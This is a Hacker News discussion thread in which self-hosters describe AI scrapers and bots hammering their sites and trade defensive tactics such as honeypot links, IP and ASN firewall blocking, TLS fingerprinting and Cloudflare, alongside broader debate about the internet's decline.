| will not stop the massively funded AI companies, so I'm
| considering poisoning the scrapers with garbage code, only
| targeting blind scrapers, of course.
| mrweasel wrote:
| Sadly we're now seeing services that sell proxy services that
| allows you to scape from a wide variety of residential IPs,
| some even goes so far as to labels their IPs as "ethically
| sources".
| skopje wrote:
| sad but hosting static content like his site in a cloud would
| save him a headache. i know i know, "do it yourself" and all but
| if that is his path he knows the price. maybe i am wrong and do
| not understand the problem but it seems like he is asking for a
| headache.
|
| edit: words
| Nifty3929 wrote:
| I think the author would agree, and is in fact the point of his
| post.
|
| The only way to solve these problems is using some large hosted
| platform where they have the resources to constantly be
| managing these issues. This would solve their problem.
|
| But isn't it sad that we can't host our own websites anymore,
| like many of us used to? It was never easy, but it's nearly
| impossible now and this is only one reason.
| skopje wrote:
| i think it has been a hard to host a site since about 2007. i
| stopped then because it is too much work to keep it safe.
| even worse now but it has always been extra work since search
| engines. maybe the OP is just getting older and wants to
| spend time with his kids and not play with nginx haha.
| zdc1 wrote:
| I wonder if you can have a chain of "invisible" links on your
| site that a normal person wouldn't see or click. The links can go
| page A -> page B -> page C, where a request for C = instant IP
| ban.
| chrisweekly wrote:
| IP addresses from scrapers are innumerable and in constant
| rotation.
| SkiFire13 wrote:
| Scrapers nowadays can use residential and mobile IPs, so
| banning by IP, even if actual malicious requests are coming
| from them, can also prevent actual unrelated people from
| accessing your service.
| SoftTalker wrote:
| Unless you're running a very popular service, unlikely that a
| random residential IP would be both compromised by a
| malicious VPN and also trying to access your site
| legitimately.
| arbol wrote:
| Lots of people have chrome extensions installed that use
| their connection like proxy so this is more common than you
| think
| SoftTalker wrote:
| Can you provide any examples of these extensions? I'm not
| doubting you, just curious.
| arbol wrote:
| There's one mentioned here:
| https://www.bleepingcomputer.com/news/security/data-
| stealing...
|
| Anyone who owns a chrome extension with 50k+ installs is
| regularly asked to sell it to people (myself included).
| The people who buy the extensions try to monetize them
| any way they can, like proxying traffic for malicious
| scrapers / attacks.
| esseph wrote:
| Botnets are massive these days.
|
| Also a lot of big companies are paying for residential
| "proxies" to scrape traffic from for AI.
| theoreticalmal wrote:
| How can a scraper get a mobile IP address?
| arbol wrote:
| Just one of many offering this service
| https://brightdata.com/proxy-types/mobile-proxies
| Habgdnv wrote:
| I self host and I have something like this but more obvious: i
| wrote a web service that talks to my mikrotik via API and add
| the IP of the requester to the block list with a 30 day timeout
| (configurable ofc). It hostname is "bot-ban-
| me.myexamplesite.com" and it is like a normal site in my
| reverse proxy. So when I request a cert this hostname is in the
| cert, and in the first few minutes i can catch lots of bad
| apples. I do not expect anyone to ever type this. I do not
| mention the address or anything anywhere, so the only way to
| land there is to watch the CT logs.
| trescenzi wrote:
| There was an article just yesterday which detailed doing this
| as not in order to ban but in order to waste time. You can also
| zip bomb people which is entertaining but probably not super
| effective.
|
| https://herman.bearblog.dev/messing-with-bots/
|
| https://news.ycombinator.com/item?id=45935729
| wibbily wrote:
| I do something like this. Every page gets an invisible link to
| a honeypot. Click the link, 48hr ban.
|
| Honestly I have no idea how well it works, my logs are still
| full of bots. *Slow* bots, though. As long as they're not
| ddosing me I guess it's fine?
| SoftTalker wrote:
| We do something similar for ssh. If a remote connection tries
| to log in as "root" or "admin" or any number of other usernames
| that indicate a probe for vulnerable configurations, that's an
| insta-ban for that IP address (banned not only for SSH but for
| everything).
| sequoia wrote:
| I don't know if there's a simple solution to deploy this but JA3
| fingerprinting is sometimes used to identify similar _clients_
| even if they 're spread across IPs:
| https://engineering.salesforce.com/tls-fingerprinting-with-j...
| arbol wrote:
| You need to terminate the TLS connection yourself so this
| prevents people from using DNS proxy, e.g. Cloudflare. Then you
| have to run a server that has a module that computes the
| ja3/ja4, e.g. nginx. Even then, it's possible to set your
| client hello in python/curl/etc. to exactly mirror the JA4 of
| your chosen browser like Chrome. So ja4 stops basic bots but
| most seasoned scrapers already implement valid ja4s/ja3s
| petermcneeley wrote:
| The real internet has yet to be invented.
| zkmon wrote:
| Common man never had a need for internet or global connectedness.
| DARPA wanted to push technology to gain upper hand in the world
| matters. Universities pushed technology to show progress and sell
| research. Businesses pushed technologies to have more sales. It
| was kind of acid rain that was caused by the establishments and
| sold as scented rain.
| wartywhoa23 wrote:
| This sentiment - along the lines of "the world became too
| dependent on the Internet", "Internet wasn't a good thing to
| begin with", "Internet is a threat to national security" etc -
| has been popping up on HN too often lately, emerged too
| abruptly and correlates with the recent initiatives to crack
| down on the Internet too well.
|
| If this is your own opinion and not a part of a psyop to
| condition people into embracing the death of the Internet as we
| know it, do you have any solution to propose?
| gchamonlive wrote:
| You don't need to have a solution to explore a problem in my
| opinion. OP comment is problematic but for reasons other than
| not having a proposed solution.
| gchamonlive wrote:
| > Common man never had a need for internet or global
| connectedness
|
| That's not how culture evolves. You don't necessarily need to
| have a problem so that a solution is developed. You can very
| well have a technology developed for other purposes, or just
| for exploration sake, and then as this tech exists uses for it
| start to pop post hoc.
|
| You therefore ignore the immense benefit of access to
| information that technology has, something that wasn't
| necessarily a problem for the common man but once its there,
| the popularization of the access to information, they adapt and
| grow dependent on it. Just like electricity.
| zkmon wrote:
| >>immense benefits ??
|
| People with dialup telephones never asked for a smartphone
| connected to internet. They were just as happy back then or
| even more happy because phone didn't eat off their time or
| cause posture problems.
|
| Sure, shopping was slower without amazon website, but not
| less happy experience back then. Infact homes had less junk
| and people saved more money
|
| Messaging? sure it makes you spend time with 100 whatsapp
| groups, where 99% of the people don't know you personally.
|
| It helped companies to sell more of the junk more quickly.
|
| It created bloggers and content creators who lived in an
| imaginary world thinking that someone really consumes their
| content.
|
| It created karma beggers who begged globally for likes that
| are worth nothing.
|
| It created more concentration of wealth at some weird
| internet companies, which don't solve any of the world
| problems or basic needs of the people.
|
| And finally it created AI that pumps plastic sewage to fill
| the internet. There it is, your immensely useful internet.
|
| As if the plastic pollution was not enough in the real world,
| the internet will be filled with plastic content.
|
| What else did internet give that is immensely helpful?
| wartywhoa23 wrote:
| You're blaming the hammer for people driving nails into
| other's heads instead of walls.
|
| A friend of mine, who had a similar opinion on technology,
| once watched a movie that seemed to reinforce it in his
| eyes, and tried to persuade me as if it was the ultimate
| proof that all technology is evil.
|
| The plot depicted a happy small tribe of indigenous people
| deep in the rainforest, who never ever saw any artifacts of
| civilization. They never knew war, homicide, or theft.
| Basically, they knew no evil. Then, one day, a plane flies
| over and someone frivolously tosses an emptied bottle of
| Coca-Cola out of the window (sic!). A member of the tribe
| finds it in the forest and brings back to the village. And,
| naturally, everyone else wants to get hold of the bottle,
| because it's so supernatural and attractive. But the guy
| decides he's the only owner, refuses and then of course
| kills those who try to get it by force, and all hell breaks
| loose in no time.
|
| "See", - concludes my friend triumphally, - "the technology
| brought evil into this innocent tribe!"
|
| "But don't you think that evil already lurked in those
| people to start with, if they were ready to kill each other
| for shiny things?" - I asked, quite baffled.
|
| "Oh, come on, so you're just supporting this shit!" was the
| answer...
| zkmon wrote:
| You didn't actually refute any of the examples I gave.
| Show me the benefits of internet which helped equal
| sharing of the resources of this planet. Show me how
| internet did not help concentration of power and wealth.
| Show me how people's attention span and physical spaces
| are not filled by junk thanks to internet.
| wartywhoa23 wrote:
| Why refute the examples based on the false premise that
| it's the medium's fault that it's filled with plastic
| bullshit (which I'm totally agree with, mind you)?
|
| What's next, blaming electromagnetic field and devices to
| modulate it for beeing full of propaganda, violence and
| all kinds of filth the humankind is capable of creating?
| You find what you seek, and if not, keep turning that
| damn knob further.
|
| But since you insist, some good frequencies to tune into:
|
| 1) Self-education in whatever field of practical or
| theoretical knowldege you're interested in;
|
| 2) Seeing a wider picture of the world than your local
| authorities would like you to (yes, basically seing that
| all the world's kings are naked, which is the #1 reason
| why the Internet became such a major pain in the ass for
| the kings' trade union, so to say);
|
| 3) Being able to work from any location in the world with
| access to the Internet;
|
| 4) You mentioned selling trash en masse worldwide, but I
| know enough examples of wonderful things produced by
| independent people and sold worldwide.
|
| The list could be longer, but I hate doing useless and
| thankless work.
| zkmon wrote:
| Thanks for providing some positive examples. But these
| examples are dwarfed by the negative effects brought in
| by internet, in my view. Sure, a modulated signal can be
| used for broadcasting weather report or some propaganda.
| But the rush to push technology was done mostly by not
| talking about the negative effects. Same is happening
| with AI. Sales prospects are the positive benefits
| driving it. No one want to say that the tiger which they
| are bringing back to life, because they can, is an enemy
| of humans.
| wartywhoa23 wrote:
| I do agree with you that the negative aspects have been
| overwhelming any remaining good for quite some time, and
| that's a constant source of mourning for good things
| which keep succumbing to evil in this world for me.
| xedrac wrote:
| I run a dedicated firewall/dns box with netfilter rules to rate
| limit new connections per IP. It looks like I may need to change
| that to rate limit per /16 subnet...
| bo1024 wrote:
| I wonder if a proof of work protocol is a viable solution. To GET
| the page, you have to spend enough electricity to solve a puzzle.
| The question is whether the threshold could be low enough for
| typical people on their phones to access the site easily, but
| high enough that mass scraping is significantly reduced.
| kalavan wrote:
| There's this paper from 2004: "Proof-of-Work Proves Not to
| Work": https://www.cl.cam.ac.uk/~rnc1/proofwork.pdf
|
| The conclusion back then was that it's impossible to make a
| threshold that is both low enough and high enough.
|
| You need some other mechanism that can distinguish bad traffic
| from good (even if imperfectly), and then adjust the threshold
| based on it. See, for instance, "Proof of Work can Work":
| https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/lu...
| bo1024 wrote:
| Thanks for these references! I imagine the numbers would be
| entirely different in our context (20 years later and web
| serving, not email sending). And the idea of spammers using
| bot nets (therefore not paying for computer themselves) would
| be less relevant to LLM scraping. But I'll try to check for
| forward references on these.
| kalavan wrote:
| > And the idea of spammers using bot nets (therefore not
| paying for computer themselves) would be less relevant to
| LLM scraping.
|
| It's possible that the services that reward users for
| running proxies (or are bundled with mobile apps with a
| notice buried in the license) would also start
| rewarding/hiding compute services as well. There's
| currently no money in it because proof-of-work is so rare,
| but if it changes, their strategy might too.
| beeflet wrote:
| Good links, but this is just for email and relies on some
| (admittedly) pretty lofty assumptions
| tonyhart7 wrote:
| I'am sorry but it literally didnt works as other commenter
| cited
|
| because if you make the requirement like that, its basically
| cancel out the other effect
| IshKebab wrote:
| I feel like it _could_ work. If you think about it, you need
| the cost to the client to be greater than the cost to the
| server. As long as that is true the server shouldn 't mind
| about increased traffic because it's making a profit!
|
| Very crudely if you think that a request costs the server ~10ms
| of compute time and a phone is 30x slower then you'd need 300ms
| of client compute time to equal it which seems very reasonable.
|
| The only problem is you would need a cryptocurrency that a)
| lets you verify tiny chunks of work, and b) can't be done
| faster than you can do it on a phone using other hardware, and
| c) lets a client mine money without being to actually spend it
| ("homomorphic mining"?).
|
| I don't know if anything like that exists but it would be an
| interesting problem to solve.
| beeflet wrote:
| The problem is that the attacker isn't using a phone, they
| are using some type of specialized hardware.
|
| I still think it is possible with some customized variant of
| RandomX. The server could even make a bit of money by acting
| as a mining pool by forcing the clients to mine a certain
| block template. It's just that it would need to be installed
| as a browser plugin or something, it wouldn't be efficient
| running within a page.
|
| Also the verification process for RandomX is still pretty
| intensive. so there is a high minimum bar for where it would
| be feasible.
| smileson2 wrote:
| It's probably just time for the web page to die
| zelphirkalt wrote:
| What do you mean by that? Web pages is the central mechanism,
| we use to put information on the web. Of course many websites
| are shitty and could be much simpler to convey their
| information, without looking crap at all. But the web page in
| general? Why would we ever get rid of something so useful? And
| what do you suggest as an alternative?
| ksenzee wrote:
| ...they said, on a web page.
| cosmicgadget wrote:
| > Other things I've noticed is increased traffic with Referer
| headers coming from strange websites such as bioware.com,
| mcdonalds.com, and microsoft.com
|
| I've been seeing this too, I guess scrapers think they can get
| through some blockers with a referrer?
| ModernMech wrote:
| The Internet was a scene, and like all scenes it's done now the
| corpos have moved in and taken over (because at that point it's
| just ads and rent extraction in perpetuity). I dunno
| what/where/when the next tech scene will be, but I do know it's
| _not_ going to come from Big Tech. See: Metaverse.
| jcalvinowens wrote:
| Scrapers have constantly been running against my cgit server for
| the past year, but they're bizarrely polite in my case... 2-3
| requests per minute.
|
| This whole enterprise is clearly run by exceptionally dumb
| people, since you can just clone all the code I host there
| directly from upstreams...
| [16/Nov/2025:16:21:12 +0000] 190.92.214.144:34638 . "GET /cgit/li
| nux/commit/drivers/vlynq?h=v5.15.76&id=59d42cd43c7335a3a8081fd6ee
| 54ea41b0c239be HTTP/1.1" -> 200 3051b 3.42x 0.239ms
| [16/Nov/2025:16:22:15 +0000] 188.239.57.1:40328 . "GET /cgit/linu
| x/commit/kernel/range.c?h=v6.12.31&id=459b37d423104f00e87d1934821
| bc8739979d0e4 HTTP/1.1" -> 200 2993b 3.42x 0.266ms
| [16/Nov/2025:16:22:56 +0000] 190.92.217.125:56580 . "GET /cgit/li
| nux/commit/kernel?h=v5.15.92&id=f01aefe374d32c4bb1e5fd1e9f931cf77
| fca621a HTTP/1.1" -> 200 3091b 3.28x 0.250ms
| [16/Nov/2025:16:23:17 +0000] 159.138.10.64:44540 . "GET /cgit/lin
| ux/commit/drivers/mtd/mtdcore.c?h=v6.2.15&id=249858575fd3f27904d6
| bb775e5ab500e9ef3b0f HTTP/1.1" -> 200 3415b 3.47x 0.251ms
| [16/Nov/2025:16:23:58 +0000] 119.13.101.228:44342 . "GET /cgit/li
| nux/commit/drivers/gpio?h=v6.6.93&id=bc7fe1a879fc024942bb9eff173f
| a619b722d09b HTTP/1.1" -> 200 3582b 3.37x 0.250ms
| firefoxd wrote:
| I have been using zipbombs and they were effective to some
| extent. Then I had the smart idea to write about it on HN [0].
| The result was a flood of new types of bots that overwhelmed my
| $6 server. For ~100k daily request, it wasn't sustainable to
| serve 1 to 10MB payloads.
|
| I've updated my heuristic to only serve the worst offenders, and
| created honeypots to collect ips and repond with 403s. After a
| few months, and some other spam tricks I'll keep to myself this
| time, my traffic is back to something reasonable again.
|
| [0]: https://news.ycombinator.com/item?id=43826798
| tetris11 wrote:
| There's likely a large market for this kind of thing. Maybe
| time to spin out a side business and deploy your heuristics to
| struggling IPs.
|
| Though I have to admit I dont know who your target audience
| would be. Self-hosting orgs don't tend to be flush with cash
| AaronAPU wrote:
| Everything good enough to become popular gets swarmed by the
| teeming masses and then exploited and destroyed.
|
| The only solution seems to be to constantly abandon those things
| and move on to new frontiers to enjoy until the cycle repeats.
| svara wrote:
| The Internet has really been an interesting case study for what
| happens between people when you remove a varying number of layers
| of social control.
|
| All the way back to the early days of Usenet really.
|
| I would hate to see it but at the same time I feel like the
| incentives created by the bad actors really push this towards a
| much more centralized model over time, e.g. one where all traffic
| provenance must be signed and identified and must flow through a
| few big networks that enforce laws around that.
| Cosi1125 wrote:
| "Socialists"* argue for more regulations; "liberals" claim that
| there should be financial incentives to not do that.
|
| I'm neither. I believe that we should go back to being
| "tribes"/communities. At least it's a time-tested way to -
| maybe not prevent, but somewhat allieviate - the tragedy of the
| commons.
|
| (I'm aware that this is a very poor and naive theory; I'll
| happily ditch it for a better idea.)
|
| --
|
| *) For the lack of a better word.
| thrance wrote:
| What would prevent attacks between "tribes"? What would
| prevent one from taking over the others and sending us back
| to square one?
| Cosi1125 wrote:
| Little would prevent attacks by APTs and other powerful
| groups. (This, btw., is one of the few facets of this
| problem that technology could help solve.) But a trivial
| change: a hard requirement to sign up (=send a human-
| composed message to one of the moderators) to be able to
| participate (or, in extreme cases, to read the contents)
| "automagically" stops almost all spam, scrapers (in the
| extreme case), vandalism, etc. (from my personal experience
| based on a rather large sample).
|
| I think it's one of the multi-faceted problems where
| technology (a "moat", "palisade", etc. for your "tribe")
| should accompany social changes.
| erickhill wrote:
| I very much relate to the author's sour mood and frustration. I
| also host a small hobby forum and have experienced the same
| attacks constantly, and it has gotten especially bad the last
| couple of years with the rise of AI.
|
| In the early days I put Google Analytics on the site so I could
| observe traffic trends. Then, we were all forced to start adding
| certificates to our sites to keep them "safe".
|
| While I think we're all doomed to continue that annual practice
| or get blocked by browsers, I have often considered removing
| Google Analytics. Ever since their redesign it is essentially
| unusable for me now. What benefit does it bring if I can't
| understand the product anymore?
|
| Last year, in a fit of desperation, I added Cloudflare. This has
| a brute force "under attack" mode that seems to stop all bots
| from accessing the site. It puts up a silly "hang on a second,
| are you human" page before the site loads, but it does seem to
| work. It is great UX? No, but at least the site isn't getting
| hammered by various locations in Asia. Cloudflare also let me
| block entire countries, although that seems to be easily fooled.
|
| I also don't think a lot of the bots/AI crawlers honor the rules
| set in the robots.txt. It's all an honor system anyway, and they
| are completely lacking in it.
|
| There need to be some hard and fast rules put in place, somehow,
| to stop the madness.
| timpera wrote:
| Cloudflare does work, but it often destroys the experience for
| legitimate users. On the website I manage, non-technical users
| were often getting stuck on the Cloudflare captcha, so I ended
| up removing it.
|
| Then there's also the issue with dependence to US-based
| services, but that may not be an issue for you.
| mrb wrote:
| Unpopular opinion: the real source of the problem is not
| scrapers, but your unoptimized web software. Gitea and Fail2ban
| are resource hogs in your case, either unoptimized or poorly
| configured.
|
| My tiny personal web servers can whistand thousands of requests
| per second, barely breaking a sweat. As a result, none of the
| bots or scrapers are causing any issue.
|
| _" The only thing that had immediate effect was sudo iptables -I
| INPUT -s 47.79.0.0/16 -j DROP"_ Well, by blocking an entire /16
| range, it is this type of overzealous action that contributes to
| making the internet experience a bit more mediocre. This is the
| same thinking that lead me to, for example, not being able to
| browse homedepot.com from Europe. I am long-term traveling in
| Europe and like to frequent DIY websites with people posting
| links to homedepot, but no someone at HD decided that European
| IPs couldn't access their site, so I and millions of others are
| locked out. The /16 is an Alibaba AS, and you make the assumption
| that most of it is malicious, but in reality you don't know. Fix
| your software, don't blindly block.
| skybrian wrote:
| Isn't this problem why Cloudflare is popular? You can write your
| own server, but outsource protecting it from bots.
|
| Perhaps there are better alternatives?
| foo-bar-bat wrote:
| When ever was the internet a safe haven, from what exactly?
| eimrine wrote:
| From governments, of course. There were times when criticism of
| anything and everything was a common and safe practice online.
| There are very few places where it is possible to keep
| practicing this now.
| m3047 wrote:
| Upvoted not because the internet has ever been a safe haven, but
| for simply taking a moment to document the issue. But then again,
| I can't even give away a feed of what's bouncing off of my walls,
| drowning in my moat.
|
| (An Alibaba /16? I block not just 3/8, but every AWS range I can
| find.)
| zokier wrote:
| fyi aws have been publishing (since 2014) all their IP ranges
| in simple json format https://aws.amazon.com/blogs/aws/aws-ip-
| ranges-json/
|
| I'd hope other major clouds would do the same
| A1kmm wrote:
| It might be easier to block by ASN rather than hard-coding IP
| ranges. Something as simple as this in cron every 24 hours will
| help (adjust the ASNs in the bzgrep to your taste - and couple
| with occasional persistence so you don't get hit every reboot):
|
| TEMPDIR=$(mktemp -d)
|
| trap 'rm -r "$TEMPDIR"' EXIT
|
| curl https://archive.routeviews.org/oix-route-views/oix-full-
| snap... -Lo "$TEMPDIR/snapshot.bz2"
|
| bzgrep -e " (15828|213035|400377|399471|210654|46573|211252|629
| 04|135542|132372|36352|209641|7552|36352|12876|53667|138608|150
| 393|60781|138607) i" $TEMPDIR/snapshot.bz2 | cut -d" " -f 3 |
| sort | uniq > $TEMPDIR/badranges
|
| iptables -N BAD_AS || true
|
| iptables -D INPUT -j BAD_AS || true
|
| iptables -A INPUT -j BAD_AS
|
| iptables -F BAD_AS
|
| for ROUTE in $(cat "$TEMPDIR/badranges"); do
| iptables -A BAD_AS -s $ROUTE -j DROP;
|
| done
| miyuru wrote:
| If anyone wants the 2000s internet experience for a while, I
| recommend deploying a website on IPv6-only server.
|
| It will be accessible to only about 50% of the internet, but back
| then not many people had internet anyway.
| k0tan32 wrote:
| Some HNers already mentioned that the internet has not been a
| safe haven for a long time. All these vulnerability scanners and
| parsers were pinging my localhost servers even in mid 2k. It has
| just become worse, and even OSS and usually captcha-free places
| are installing things like Anubis [1].
|
| All of this reminds me of some of Gibson's short stories I read
| recently and his description of Cyberspace: small corporate
| islands of protected networks in a hostile sea of sapient AIs
| ready to burn your brain.
|
| Luckily, LLMs are not there yet, except you can still get your
| brain burnt from AI slop or polarizing short videos.
|
| [1] - https://anubis.techaro.lol/
| aledalgrande wrote:
| I wonder how much of the world's compute/electricity is wasted in
| malicious bots.
| d4rkn0d3z wrote:
| It's not hard to build an internet that serves the people but
| nobody will pay you to do it, and if you are so brazen as to do
| it yourself then you will be investigated, harrassed, arrested,
| and beaten. Having been visited with every sorrow short of death,
| you will beg for death.
| Animats wrote:
| I wonder how much scraper effort is being spent talking to
| Samsung refrigerators and such.
| phendrenad2 wrote:
| I have a question about this part:
|
| > moving the entire hosting to CloudFlare that will do it for me
| ... nor do I want to route my visitors through tracking-enabled
| USA servers
|
| Isn't there some EU equivalent to CloudFlare he can use?
|
| It's hard to admit, but DDoS mitigation is an essential part of
| having even a simple website these days.
| singpolyma3 wrote:
| Yet another story demonstrating why you should not run fail2ban
___________________________________________________________________
(page generated 2025-11-16 23:01 UTC)